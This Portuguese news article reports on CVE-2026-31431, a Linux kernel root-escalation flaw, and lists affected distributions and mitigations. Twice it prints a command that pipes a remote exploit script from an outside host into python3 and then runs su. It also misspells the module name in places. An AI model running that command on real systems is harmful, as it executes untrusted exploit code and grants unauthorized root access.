- Falha no Linux permite acesso root imediato a usuários locais sem privilégios (CVE-2026-31431), afetando quase todas as distribuições e existindo desde 2017, incluindo Ubuntu 24, RHEL 10, SUSE 16, Amazon Linux 2023 e o WSL2 do Windows. A exploração pode exigir apenas cerca de 732 bytes.
- Pesquisadores da Xint Code descobriram a vulnerabilidade com o auxílio de assistente de Inteligência Artificial; a falha já tinha correção, mas a divulgação rápida reduziu o tempo para resposta.
- Para verificar a vulnerabilidade, pode-se executar curl https://copy.fail/exp | python3 && su com uma conta sem privilégios, embora isso dependa de código de terceiros.
- Mitigações: se o kernel carrega o módulo algif_aaed, é possível desativá-lo com echo “install algif_aead /bin/false” em um arquivo de configuração; em distribuições que compilam a funcionalidade no núcleo (como RHEL e WSL2), é recomendado impedir que usuários abram sockets AF_ALG por meio de perfis Seccomp, AppArmor ou SELinux.
- O ataque é executado na memória, sem gravações em disco, e o código-fonte da prova de conceito está disponível para quem quiser testar; a divulgação pública gerou debates sobre o timing e a necessidade de correção rápida.
Pesquisadores da Xint Code identificaram uma vulnerabilidade grave no Linux que permite acesso root imediato a usuários locais sem privilégios. A falha, registrada como CVE-2026-31431, pode impactar servidores multiusuário, ambientes de contêineres e pipelines de CI/CD desde 2017. O problema afeta virtualmente todas as distribuições Linux em uso.
A descoberta ocorreu com a ajuda de um assistente de Inteligência Artificial. Os pesquisadores destacam que, apesar da correção já ter sido aplicada no kernel, a divulgação rápida reduz o tempo de resposta de distribuições e administradores. A vulnerabilidade está presente mesmo em ambientes de produção.
Entre as distribuições citadas como afetadas estão Ubuntu 24, RHEL 10, SUSE 16 e Amazon Linux 2023. O Windows Subsystem for Linux 2 (WSL2) também é impactado. Em alguns casos, a exploração pode ocorrer com apenas 732 bytes de código.
Para verificar a exposição, especialistas indicam executar curl https://copy.fail/exp | python3 && su a partir de uma conta sem privilégios. Embora simples, o método depende de um script externo confiável. O código-fonte da prova de conceito está disponível para consulta pública.
Como mitigação, basta desativar o módulo algif_aaed se ele for carregado como módulo. Um comando simples pode resolver: echo install algif_aead /bin/false > /etc/modprobe.d/disable-algif.conf. Em distribuições que integram a função no núcleo, como RHEL e WSL2, a mitigação envolve impedir que usuários abram sockets AF_ALG via perfis de segurança, como seccomp, AppArmor ou SELinux.
Especialistas destacam que, mesmo com correções, o risco permanece até que todas as distribuições atualizem seus kernels. A divulgação precoce permite que administradores apliquem as medidas de proteção com antecedência, reduzindo vulnerabilidade em ambientes críticos. A partir de agora, empresas devem priorizar atualizações e validação de políticas de segurança.
Entre na conversa da comunidade